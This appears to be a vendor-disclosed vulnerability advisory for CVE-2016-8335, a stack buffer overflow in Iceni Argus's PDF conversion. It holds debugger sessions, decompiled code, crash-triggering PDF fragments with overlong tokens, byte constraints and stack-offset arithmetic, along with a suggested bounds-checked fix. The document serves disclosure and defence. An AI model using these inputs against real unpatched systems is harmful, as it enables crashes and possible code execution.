CVE-2016-8335
An exploitable stack-based buffer overflow vulnerability exists in the ipNameAdd functionality of Iceni Argus. A specially crafted PDF file can cause a buffer overflow resulting in arbitrary code execution. An attacker can send or otherwise provide a malicious PDF file to trigger this vulnerability.
Iceni Argus Version 6.6.04 (Sep 7 2012) NK - Linux x64
Iceni Argus Version 6.6.04 (Nov 14 2014) NK - Windows x64
http://www.iceni.com/legacy.htm
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSSv3 Calculator: https://www.first.org/cvss/calculator/3.0
This vulnerability is present in Iceni Argus, which is used, among other things, to convert PDF files to (X)HTML form. The product is mainly used by MarkLogic for PDF document conversions as part of their web-based document search and rendering. A specially crafted PDF file can lead to a stack-based buffer overflow and ultimately to remote code execution.
Let's investigate this vulnerability. After running the PDF-to-HTML converter with a malformed PDF file as input, we can observe in gdb that the return address of a function has been overwritten:
gdb-peda$ r
Starting program: /home/icewall/bugs/cvtpdf/convert config
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Loading configuration...
Parsing macros...
Macro synth-bookmarks='true'
Macro image-output='true'
Macro text-output='true'
Macro zones='false'
Macro ignore-text='true'
Macro remove-overprint='false'
Macro illustrations='true'
Macro line-breaks='true'
Macro image-quality='75'
Macro page-start=''
Macro page-end=''
Macro document-start=''
Macro document-end=''
features='11140221'
Processing...
*** stack smashing detected ***: /home/icewall/bugs/cvtpdf/convert terminated
Program received signal SIGABRT, Aborted.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x6c23 ('#l')
ECX: 0x6c23 ('#l')
EDX: 0x6
ESI: 0x4e ('N')
EDI: 0xf7f0c000 --> 0x1aada8
EBP: 0xfffc69cc --> 0xf7ec4443 ("stack smashing detected")
ESP: 0xfffc6758 --> 0xfffc69cc --> 0xf7ec4443 ("stack smashing detected")
EIP: 0xf7fdace0 (pop ebp)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7fdacdc: nop
0xf7fdacdd: nop
0xf7fdacde: int 0x80
=> 0xf7fdace0: pop ebp
0xf7fdace1: pop edx
0xf7fdace2: pop ecx
0xf7fdace3: ret
0xf7fdace4: int3
[------------------------------------stack-------------------------------------]
0000| 0xfffc6758 --> 0xfffc69cc --> 0xf7ec4443 ("stack smashing detected")
0004| 0xfffc675c --> 0x6
0008| 0xfffc6760 --> 0x6c23 ('#l')
0012| 0xfffc6764 --> 0xf7d8f687 (xchg ebx,edi)
0016| 0xfffc6768 --> 0xf7f0c000 --> 0x1aada8
0020| 0xfffc676c --> 0xfffc6808 --> 0x10
0024| 0xfffc6770 --> 0xf7d92ab3 (mov edx,DWORD PTR gs:0x8)
0028| 0xfffc6774 --> 0x6
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fdace0 in ?? ()
As we can see above, the stack protection mechanism was triggered, which means that the return address has indeed been corrupted. Checking the call stack:
gdb-peda$ bt 10
#0 0xf7fdace0 in ?? ()
#1 0xf7e5cb8b in __GI___fortify_fail (msg=<optimized out>, msg@entry=0xf7ec4443 "stack smashing detected") at fortify_fail.c:38
#2 0xf7e5cb1a in __stack_chk_fail () at stack_chk_fail.c:28
#3 0x0839aef4 in __stack_chk_fail_local ()
#4 0x080d3764 in ipNameAdd ()
#5 0x6d303062 in ?? ()
#6 0x6d303062 in ?? ()
#7 0x6d303062 in ?? ()
#8 0x6d303062 in ?? ()
#9 0x6d303062 in ?? ()
(More stack frames follow...)
The backtrace shows that the function where the overflow occurred is ipNameAdd.
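The corrupted frames in the backtrace all carry the address 0x6d303062. A minimal sketch, assuming a little-endian x86 target as in the session above, shows how such a value can be decoded back into the bytes that were written over the stack. The helper name dword_to_ascii is hypothetical and not part of Argus or gdb.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: split a 32-bit value into its four bytes in
 * little-endian memory order (lowest address first) and NUL-terminate.
 * out must have room for 5 bytes. */
static void dword_to_ascii(uint32_t value, char out[5])
{
    assert(out != NULL);
    for (int i = 0; i < 4; i++) {
        /* Byte i in memory holds bits [8*i, 8*i+7] of the value. */
        out[i] = (char)((value >> (8 * i)) & 0xFF);
    }
    out[4] = '\0';
}
```

Calling dword_to_ascii(0x6d303062, buf) yields the string b00m, which matches the repeated pattern that shows up later in the crafted PDF.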
Using the rr debugger, we can easily go back in time to this function and investigate the important details of the overflow:
(rr) b ipNameAdd
Breakpoint 1 at 0x80d36a9
(rr) rc
Continuing.
Breakpoint 1, 0x080d36a9 in ipNameAdd ()
(rr) context
$5 = 0x6c97
[----------------------------------registers-----------------------------------]
EAX: 0xb3c7298 ("b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m"...)
EBX: 0x8f58750 --> 0x8f57ef0 --> 0x1
ECX: 0x30 ('0')
EDX: 0x839f6ea --> 0x64002a62 ('b*')
ESI: 0xa ('\n')
EDI: 0x0
EBP: 0xfff43f68 --> 0xfff43fd8 --> 0xfff44008 --> 0xfff44078 --> 0xfff440a8 --> 0xfff440c8 --> 0xfff44118 --> 0xfff44148 --> 0xfff44218 --> 0xfff44278 --> 0xfff44298 --> 0xfff7a448 --> 0x0
ESP: 0xfff43e40 --> 0xb380370 --> 0x0
EIP: 0x80d36a9 --> 0xe8f45d89
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80d36a0 <ipNameAdd>: push ebp
0x80d36a1 <ipNameAdd+1>: mov ebp,esp
0x80d36a3: sub esp,0x128
=> 0x80d36a9: mov DWORD PTR [ebp-0xc],ebx
0x80d36ac: call 0x8050f3f <__i686.get_pc_thunk.bx>
0x80d36b1: add ebx,0xe8509f
0x80d36b7: mov DWORD PTR [ebp-0x4],edi
0x80d36ba: mov edi,DWORD PTR [ebp+0x8]
[------------------------------------stack-------------------------------------]
0000| 0xfff43e40 --> 0xb380370 --> 0x0
0004| 0xfff43e44 --> 0xb37f068 --> 0xb37fa04 --> 0xb37f1a4 --> 0xb37f8f8 --> 0xb37f6e0 --> 0x0
0008| 0xfff43e48 --> 0xfff43e60 --> 0x3
0012| 0xfff43e4c --> 0x0
0016| 0xfff43e50 --> 0x3
0020| 0xfff43e54 --> 0xf754c02a --> 0x4245c8b
0024| 0xfff43e58 ("MAGIC")
0028| 0xfff43e5c --> 0x670043 ('C')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
We are now at the beginning of the ipNameAdd function, before the overflow took place. We can see that the call stack is not corrupted:
(rr) bt
#0 0x080d36bd in ipNameAdd ()
#1 0x080ee0bd in ipDocExecStack ()
#2 0x080b6ed3 in ipStreamParse ()
#3 0x0809e02e in _ObjResolveMem ()
#4 0x0809e191 in ipObjResolveMem ()
#5 0x0809e276 in ipObjResolve ()
#6 0x080914d4 in ipDocCreate ()
#7 0x0806c371 in _icnDocCreate ()
#8 0x08054580 in dumpFile ()
#9 0x080548e7 in dumpCommandLine ()
#10 0x08052111 in icnArgusExtract ()
#11 0x08050566 in main ()
#12 0xf7479af3 in __libc_start_main (main=0x804fe00 <main>, argc=0x2, argv=0xfff7a4e4, init=0x839ae00 <__libc_csu_init>,
fini=0x839adf0 <__libc_csu_fini>, rtld_fini=0xf7715160 <_dl_fini>, stack_end=0xfff7a4dc) at libc-start.c:287
#13 0x0804fd61 in _start ()
Before we step a few instructions further, let's take a look at the ipNameAdd function in pseudo-code to understand the bigger picture:
Line 1 int __cdecl ipNameAdd(char *src)
Line 2 {
Line 3 int v1; // esi@1
Line 4 int result; // eax@2
Line 5 int v3; // eax@5
Line 6 int v4; // esi@7
Line 7 char v5; // [esp+Ch] [ebp-11Ch]@1
Line 8 char dest[255]; // [esp+18h] [ebp-110h]@1
Line 9 int v7; // [esp+118h] [ebp-10h]@1
Line 10
Line 11 v7 = *MK_FP(__GS__, 20);
Line 12 strcpy(dest, src);
Line 13 v1 = rbtree_lookup(&v5, ipd[365]);
Line 14 if ( strlen(src) > 0xFF )
Line 15 {
Line 16 v3 = ipGStrGetStr("ipnametree.c", 0, "Name too long");
Line 17 icnErrorSet(28, v3);
Line 18 result = 0;
Line 19 }
Line 20 else
Line 21 {
Line 22 result = v1;
Line 23 if ( !v1 )
Line 24 {
Line 25 v4 = icnChainAlloc(ipd[934], 268);
Line 26 result = 0;
Line 27 if ( v4 )
Line 28 {
Line 29 *v4 = 0;
Line 30 *(v4 + 4) = 0;
Line 31 *(v4 + 8) = 0;
Line 32 strcpy((v4 + 12), src);
Line 33 rbtree_insert(v4, ipd[365]);
Line 34 result = v4;
Line 35 }
Line 36 }
Line 37 }
Line 38 if ( *MK_FP(__GS__, 20) != v7 )
Line 39 _stack_chk_fail_local();
Line 40 return result;
Line 41 }
From this pseudo-code we can immediately spot the vulnerability: at line 12, right at the beginning of the function, the argument src is passed directly to strcpy without any checks. The length check for src is done at line 14, AFTER the strcpy call. We can also see at line 8 that the dest buffer can hold up to 255 characters, so a string longer than 255 characters will cause a buffer overflow.
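The decompiler annotations in the pseudo-code give the frame offsets of dest ([ebp-110h]) and the stack canary v7 ([ebp-10h]), and the prologue (push ebp; mov ebp,esp) places the saved ebp at [ebp] and the return address at [ebp+4]. The following sketch only does the arithmetic on those offsets. The enum and function names are hypothetical, and the layout is assumed to be exactly as annotated.

```c
#include <assert.h>
#include <stddef.h>

/* Offsets relative to ebp, taken from the pseudo-code annotations and
 * the standard x86 frame set up by "push ebp; mov ebp,esp". */
enum {
    DEST_OFFSET      = -0x110, /* char dest[255]         [ebp-110h] */
    CANARY_OFFSET    = -0x10,  /* int v7 (stack canary)  [ebp-10h]  */
    SAVED_EBP_OFFSET = 0x0,    /* saved ebp              [ebp]      */
    RET_ADDR_OFFSET  = 0x4     /* return address         [ebp+4]    */
};

/* Number of bytes that strcpy has to write, starting at dest, before it
 * reaches the first byte of the slot at target_offset. */
static size_t bytes_until(int target_offset)
{
    assert(target_offset >= DEST_OFFSET);
    return (size_t)(target_offset - DEST_OFFSET);
}
```

Under these assumptions bytes_until(CANARY_OFFSET) is 256 and bytes_until(RET_ADDR_OFFSET) is 276, so the canary is the first thing damaged and the return address follows 20 bytes later.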
Our next step is to figure out which part of the PDF document the src string comes from.
The part of the document where the vulnerable string is located looks like this:
%PDF-1.4
1 0 obj
<</Type /Catalog
/Pages 2 0 R
/MAGIC b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m
>>
endobj
(...)
In this example the b00m string is located inside the dictionary as the value for the key (object name) /MAGIC.
But what type of object is it? String? Int? Float? Something else?
It turns out it is none of them, and that is what causes the problem. To see this we need to look one function up the call stack, at ipDocExecStack.
This function is, among other things, responsible for parsing tokens/strings from the PDF document and converting them into proper objects:
Line 1 if ( *v8 == '/' )
Line 2 {
Line 3 if ( strlen(v8) - 1 > 0xFF )
Line 4 {
Line 5 v13 = 0;
Line 6 v64 = ipGStrGetStr("ipscan.c", 1, "Name too long '%s'");
Line 7 icnErrorSet(12, v64, token);
Line 8 return v13;
Line 9 }
Line 10 *&v76 = COERCE_FLOAT(ipNameAdd(token + 1));
Line 11 if ( *&v76 == 0.0 )
Line 12 return 0;
Line 13 LOBYTE(v12) = 2;
Line 14 LOBYTE(objNumber) = 2;
Line 15 goto LABEL_20;
Line 16 }
Line 17 if ( v10 != '(' )
Line 18 {
Line 19 if ( v10 == '<' && token[v9 - 1] == '>' )
Line 20 {
Line 21 *&v76 = COERCE_FLOAT(ipStringCreateHex(a1->dword238, token + 1, v9 - 2));
Line 22 if ( *&v76 == 0.0 )
Line 23 return 0;
Line 24 goto LABEL_131;
Line 25 }
Line 26LABEL_18:
Line 27 if ( isReal(token) )
Line 28 {
Line 29 v11 = strtod(token, 0);
Line 30 LOBYTE(v12) = 6;
Line 31 LOBYTE(objNumber) = 6;
Line 32 *&v76 = v11;
Line 33 goto LABEL_20;
Line 34 }
Line 35 if ( !isInteger(token) )
Line 36 {
Line 37 v12 = COERCE_FLOAT(ipKeywordFind(token));
Line 38 LOBYTE(objNumber) = -117;
Line 39 *&v76 = v12;
Line 40 v54 = v12;
Line 41 LOBYTE(v12) = -117;
Line 42 if ( v54 != 0.0 )
Line 43 goto LABEL_20;
Line 44 v55 = ipNameAdd(token);
As you can see, there are checks and conversions for a Name object (lines 1-16), a Hex string (lines 19-25), a Real number (lines 27-34), and a check whether token is an integer at line 35. If all these checks fail, and ipKeywordFind at line 37 does not recognize token as a keyword, we end up at line 44 and token is converted into a Name object. No length checks for token are done in that case. The only scenario where the token length is checked before passing it to ipNameAdd is when token is in the “regular” Name object representation starting with “/” (lines 1-3).
If an attacker creates an overlong token that is not a “regular” Name object (that is, one without the leading “/”), it will cause a stack-based buffer overflow which can result in arbitrary code execution.
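Because not every caller validates the token length, one way to close the gap is to check the length inside the callee before any copy happens. The sketch below is not the vendor's fix. It is a minimal illustration with hypothetical names (NAME_LEN_LIMIT, name_copy_checked), assuming the same 255-character limit that the existing 0xFF comparisons use.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define NAME_LEN_LIMIT 255 /* hypothetical, mirrors the 0xFF checks */

/* Copy src into dest only if it fits. dest_size is the full size of
 * dest in bytes, including room for the terminating NUL.
 * Returns 0 on success, -1 if src is too long (dest is left untouched). */
static int name_copy_checked(char *dest, size_t dest_size, const char *src)
{
    assert(dest != NULL && src != NULL);

    size_t len = strlen(src);

    /* Reject before copying, unlike the strcpy-then-strlen order above. */
    if (len > NAME_LEN_LIMIT || len >= dest_size) {
        return -1;
    }
    memcpy(dest, src, len + 1); /* +1 copies the terminating NUL */
    return 0;
}
```

With a 256-byte destination, a name of exactly 255 characters is accepted and anything longer is rejected regardless of which branch of the tokenizer produced it.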
Of course, that string can appear in different places in the PDF document. Above we saw an example of a dictionary value, but we can also trigger the vulnerable code path when the string is an array element:
%PDF-1.4
1 0 obj
<</Type /Catalog
/Pages 2 0 R
[ b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m ]
>>
endobj
or stream content:
%PDF-1.4
1 0 obj
<</Type /Catalog
/Pages 2 0 R
>>
stream
b00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00mb00m
endstream
endobj
The characters of that string are subject to the following limitation: it can contain bytes in the range [0x21-0xff], excluding 0x80.
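The byte constraint stated above can be written down as a small predicate, which may be handy when reasoning about which inputs reach ipNameAdd unchanged. This is a sketch of the stated range only. The function names are hypothetical, and no claim is made about how the Argus tokenizer implements the restriction internally.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* True if a single byte lies in [0x21, 0xff] and is not 0x80.
 * The upper bound is implied by the unsigned char type. */
static bool token_byte_allowed(unsigned char c)
{
    return c >= 0x21 && c != 0x80;
}

/* True if every byte of the buffer satisfies the constraint. */
static bool token_bytes_allowed(const unsigned char *data, size_t len)
{
    assert(data != NULL || len == 0);
    for (size_t i = 0; i < len; i++) {
        if (!token_byte_allowed(data[i])) {
            return false;
        }
    }
    return true;
}
```

Whitespace such as 0x20, control bytes below 0x21, and the byte 0x80 are rejected, while printable ASCII like the b00m pattern passes.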
Loading configuration...
Parsing macros...
Macro synth-bookmarks='true'
Macro image-output='true'
Macro text-output='true'
Macro zones='false'
Macro ignore-text='true'
Macro remove-overprint='false'
Macro illustrations='true'
Macro line-breaks='true'
Macro image-quality='75'
Macro page-start=''
Macro page-end=''
Macro document-start=''
Macro document-end=''
features='11140221'
Processing...
*** stack smashing detected ***: /home/icewall/bugs/cvtpdf/convert terminated
Program received signal SIGABRT, Aborted.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x9543
ECX: 0x9543
EDX: 0x6
ESI: 0x4e ('N')
EDI: 0xf7f0c000 --> 0x1aada8
EBP: 0xfffc69fc --> 0xf7ec4443 ("stack smashing detected")
ESP: 0xfffc6788 --> 0xfffc69fc --> 0xf7ec4443 ("stack smashing detected")
EIP: 0xf7fdace0 (pop ebp)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7fdacdc: nop
0xf7fdacdd: nop
0xf7fdacde: int 0x80
=> 0xf7fdace0: pop ebp
0xf7fdace1: pop edx
0xf7fdace2: pop ecx
0xf7fdace3: ret
0xf7fdace4: int3
[------------------------------------stack-------------------------------------]
0000| 0xfffc6788 --> 0xfffc69fc --> 0xf7ec4443 ("stack smashing detected")
0004| 0xfffc678c --> 0x6
0008| 0xfffc6790 --> 0x9543
0012| 0xfffc6794 --> 0xf7d8f687 (xchg ebx,edi)
0016| 0xfffc6798 --> 0xf7f0c000 --> 0x1aada8
0020| 0xfffc679c --> 0xfffc6838 --> 0x10
0024| 0xfffc67a0 --> 0xf7d92ab3 (mov edx,DWORD PTR gs:0x8)
0028| 0xfffc67a4 --> 0x6
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fdace0 in ?? ()
gdb-peda$ exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: 3f1428af0cd8ba50f2c4e1b578aa9cfa.ced4f58c0fadf0cd3623dac81e94f776
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)
gdb-peda$ exploitable -m
EXCEPTION_FAULTING_ADDRESS:0x00000000009543
EXCEPTION_CODE:0x6
FAULTING_INSTRUCTION:pop ebp
MAJOR_HASH:3f1428af0cd8ba50f2c4e1b578aa9cfa
MINOR_HASH:ced4f58c0fadf0cd3623dac81e94f776
STACK_DEPTH:14
STACK_FRAME:[vdso]+0x0
STACK_FRAME:/lib/i386-linux-gnu/libc-2.19.so!__GI___fortify_fail+0x0
STACK_FRAME:/lib/i386-linux-gnu/libc-2.19.so!__stack_chk_fail+0x0
STACK_FRAME:/home/icewall/bugs/cvtpdf/convert!__stack_chk_fail_local+0x0
STACK_FRAME:/home/icewall/bugs/cvtpdf/convert!ipNameAdd+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:Unknown+0x0
STACK_FRAME:/home/icewall/bugs/cvtpdf/convert+0x0
INSTRUCTION_ADDRESS:0x000000f7fdace0
INVOKING_STACK_FRAME:0
DESCRIPTION:Stack buffer overflow
SHORT_DESCRIPTION:StackBufferOverflow (6/22)
OTHER_RULES:PossibleStackCorruption (7/22), AbortSignal (20/22)
CLASSIFICATION:EXPLOITABLE
EXPLANATION:The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
2016-09-06 - Vendor Disclosure
2016-10-14 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.